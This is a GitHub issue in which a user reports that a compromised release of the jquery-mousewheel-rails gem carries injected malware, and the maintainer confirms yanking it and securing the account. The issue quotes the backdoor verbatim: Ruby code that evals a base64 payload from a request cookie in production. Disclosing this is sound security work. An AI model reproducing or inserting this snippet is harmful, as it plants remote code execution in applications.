### ISSUE TITLE
0.0.10 appears to contain malware

### ISSUE THREAD

**Issue by fwilkens** [crazymykl/jquery-mousewheel-rails#10]
It looks like [version 0.0.10](https://rubygems.org/gems/jquery-mousewheel-rails/versions/0.0.10) contains malware. Perhaps your Rubygems.org account was compromised? I've contacted rubygems.org security to pull the gem. You may want to reach out to them about your account.

Code injected in `/jquery-mousewheel-rails/lib/jquery-mousewheel-rails.rb`.
```
def _!;begin;yield;rescue Exception;end;end
_!{Rack::Sendfile.prepend Module.new{define_method(:call){|e|_!{eval(Base64.urlsafe_decode64(
e['HTTP_COOKIE'].match(/_n=(.+);/)[1]))};super(e)}}if Rails.env.production?}
```

**Comment by crazymykl** [comment]
Thank you for bringing this to my attention. I have yanked the affected version, reset my API key and password, and enabled MFA.
